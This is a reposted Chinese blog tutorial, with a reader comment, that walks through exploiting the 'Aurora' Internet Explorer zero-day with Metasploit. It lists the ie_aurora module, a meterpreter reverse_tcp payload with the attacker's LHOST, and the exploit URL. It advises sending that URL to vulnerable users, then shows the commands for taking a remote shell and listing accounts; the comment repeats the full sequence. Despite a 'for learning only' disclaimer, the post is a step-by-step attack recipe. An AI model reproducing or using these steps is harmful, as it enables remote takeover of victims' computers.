大漠荒颜

记录一个青海油田子弟生活的点点滴滴

“极光”IE 0day漏洞测试方法

| |
10:04 , 北纬36度
漏洞测试方法演示:
注:此攻击方法仅供学习和技术研究之用,非法利用后果自负!
对于此漏洞的简单描述在SecurityFocus已经有所介绍,同时也给出了漏洞测试程序,地址:http://www.securityfocus.com/bid/37815/
点击在新窗口中浏览此图片
这里我们用国外著名的Metasploit Framework溢出工具包来对这个漏洞做演示。
     介绍: Metasploit Framework是一款开源的安全漏洞检测工具。由于Metasploit Framework是免费的工具,因此安全工作人员常用Metasploit Framework工具来检测系统的 安全性。
      Metasploit Framework可从其官网http://www.metasploit.com 上面根据自己使用的操作系统类型进行下载,目前最新版本为Metasploit Framework 3.3.3,这里以Windows下的版本为例做演示,在使用Metasploit Framework之前需要进行安装,安装方法如下:
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
由于此工具包捆绑了NMap扫描器,所以安装的中途会提示是否安装NMap扫描器,可根据您的需要来安装,这里我们跳过不安装,所以选择“否”来继续安装Metasploit Framework。
点击在新窗口中浏览此图片
如上图:安装结束后会默认勾选启动Metasploit Framework。
点击在新窗口中浏览此图片
如上图:安装完成后会在桌面上生产两个图标,其中Metasploit Update顾名思义为Metasploit Framework的更新程序,在使用之前建议点击此图标使其漏洞库更新到最新的,Metasploit Console为Metasploit Framework的溢出攻击控制台程序。
在安装结束后会自动弹出一个黑窗口,如下图,此窗口为正在初始化Metasploit Framework的攻击测试环境,大家不要将其关闭掉。
点击在新窗口中浏览此图片
当初始化环境结束后会自动进入到溢出攻击测试控制台,如下图:
点击在新窗口中浏览此图片
如上图:根据控制台的提示漏洞库比较陈旧,所以我们需要将其更新到最新的漏洞库,这时我们只需将这个控制台关掉然后点击桌面上的Metasploit Update即可,如下图:
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
如图:大约需要几分钟的时间就可以更新完成,更新时间具体依网速而定。
点击在新窗口中浏览此图片
如上图:为程序更新完成后的启动界面
点击在新窗口中浏览此图片
如上图:首先我们敲入use exploit/windows/browser/ie_aurora命令来让溢出攻击平台挂载ie_aurora攻击测试脚本。
点击在新窗口中浏览此图片
如上图:敲入set PAYLOAD windows/meterpreter/reverse_tcp命令来设置反弹连接所用的传输协议即TCP协议。注意:命令中的PAYLOAD为大写。
点击在新窗口中浏览此图片
如上图:敲入set LHOST 10.0.95.250 来设置攻击者的IP地址,也就是本机IP地址。
点击在新窗口中浏览此图片
如上图:敲入exploithttp://10.0.95.250:8080/sBek5LTL 为攻击的URL,将这个URL发给存在此漏洞的用户点击就可以触发IE浏览器溢出进而执行恶意指令,这里我在虚拟机中点击这个链接测试。命令表示开始溢出,其中
点击在新窗口中浏览此图片
如上图:当在存在此漏洞的计算机上点击这个URL链接,溢出攻击控制台就会显示正在发送溢出指令到客户端。
点击在新窗口中浏览此图片
如上图:当存在此漏洞的计算机上触发这个链接,就会发生溢出,一旦溢出成功就会导致IE浏览器无响应。
点击在新窗口中浏览此图片
如上图:敲入sessions –i 1命令   我们来与客户端创建一个连接会话。
点击在新窗口中浏览此图片
如上图:敲入getuid命令可以查看远端计算机的计算机名和用户名。
点击在新窗口中浏览此图片
如上图:敲入shell命令就可以得到远端计算机的cmdshell了,这里我们敲入Windows系统下的查看系统用户的命令net user测试一下,命令回显出了远端计算机上的所有用户。至此溢出攻击就完成了。


本文转载于:http://www.antiyfx.com
类别:MY IT TEXT | Tags: , , , , | 1 条评论, 1878 次阅读
网友评论(1):
Email Homepage
2010/01/22 10:14
use exploit/windows/browser/ie_aurora        命令来让溢出攻击平台挂载ie_aurora攻击测试脚本。
set PAYLOAD windows/meterpreter/reverse_tcp  命令来设置反弹连接所用的传输协议即TCP协议。
                                             注意:命令中的PAYLOAD为大写。
set LHOST 10.0.95.250                        设置攻击者的IP地址,也就是本机IP地址。
exploithttp://10.0.95.250:8080/sBek5LTL      为攻击的URL,将这个URL发给存在此漏洞的用户点击                                             就可以触发IE浏览器溢出进而执行恶意指令,
                                             这里我在虚拟机中点击这个链接测试。命令表示开始                                             溢出

sessions –i 1                               命令   我们来与客户端创建一个连接会话。
getuid                                       命令可以查看远端计算机的计算机名和用户名。
shell                                        命令就可以得到远端计算机的cmdshell了
分页: 1/1 第一页 1 最后页
发表评论:

昵称: 
电邮:
网址: